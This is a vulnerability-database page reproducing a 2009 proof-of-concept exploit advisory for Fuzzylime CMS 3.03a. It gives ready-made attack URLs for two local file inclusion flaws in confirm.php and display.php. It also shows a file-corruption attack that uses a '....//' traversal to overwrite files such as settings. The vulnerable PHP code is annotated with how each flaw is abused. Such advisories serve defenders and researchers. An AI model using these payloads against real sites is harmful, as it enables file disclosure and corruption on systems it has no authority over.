Vulners
Lucene search
Fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption
+------------------------------------------------------------------------+
| fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc |
+-----------+------------------------------------------------------------+
| by staker |
+-----------+---------------------+
| mail: staker[at]hotmail[dot]it |
| url: http://cms.fuzzylime.co.uk |
+---------------------------------+
[1][LFI]
http://[target]/[path]/code/confirm.php?e[]&list= { file + nullbyte }
Vulnerable code: confirm.php (local file inclusion mq=off)
-----------------------------------------------------------------
1. <?
2. @extract($HTTP_GET_VARS); <-------- {1}
3. @extract($_GET); <----------^
27. elseif(isset($e)) { <------- {2}
28. $filename = "code/mailing/$list.inc.php"; <------- {3}
29. @include $filename; <------- {4}
-----------------------------------------------------------------
1. extract() allows to overwrite any not-defined variable via get
therefore it works regardless of register_globals settings.
2. $e is a variable not defined,therefore become $_GET['e']
3. $list is a variable not defined,therefore become $_GET['list']
4. $filename contains $list variable that will be required
-----------------------------------------------------------------
[2][LFI]
http://[target]/[path]/code/display.php?template= {file + nullbyte}
Vulnerable code: display.php (local file inclusion mq=0 & reg=on)
--------------------------------------------------------------------
98. if($_GET['print'] != "1") include "templates/${template}_f.php";
--------------------------------------------------------------------
[3][LFC]
http://[target]/[path]/code/display.php?usecache=1&s=....//settings
http://[target]/[path]/code/display.php?usecache=1&s={file + nullbyte}(mq = off)
Vulnerable code: display.php (local file corruption register_gl=1)
-----------------------------------------------------------------
1. <?
2. $s = $_GET[s];
3. $p = $_GET[p];
4. $s = str_replace("../", "", $s); <---------- {1}
5. $p = str_replace("../", "", $p);
...
54. $cachefile = "cache/${s}_${p}_$_GET[m]_$_GET[c]_$_GET[t]_$_GET[u]_$_GET[print].cache.htm"; <---- {2}
100. if($usecache == "1" && $passprot != "1" && $s != "rss" && empty($_GET[msg]) && empty($_GET[tn])) { <--- {3}
101. if($handle = fopen($cachefile, 'w')) { // Create the cache file <-------- {4}
102. $output = ob_get_contents();
103. fputs($handle, $output);
104.
105. fclose($handle);
106. }
107. }
----------------------------------------------------------------------
1. you have to use ....// to change directory because of 1st point. so
....// will be ../
2. $cachefile contains $s variable
3. if $usecache == 1 we will go ahead
4. you will overwrite a file typing the name via $s variable.
-----------------------------------------------------------------------
[x] http://www.youtube.com/watch?v=h3DQmJOkSY0
# milw0rm.com [2009-06-17]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Jun 2009 00:00Current
7.4High risk
Vulners AI Score7.4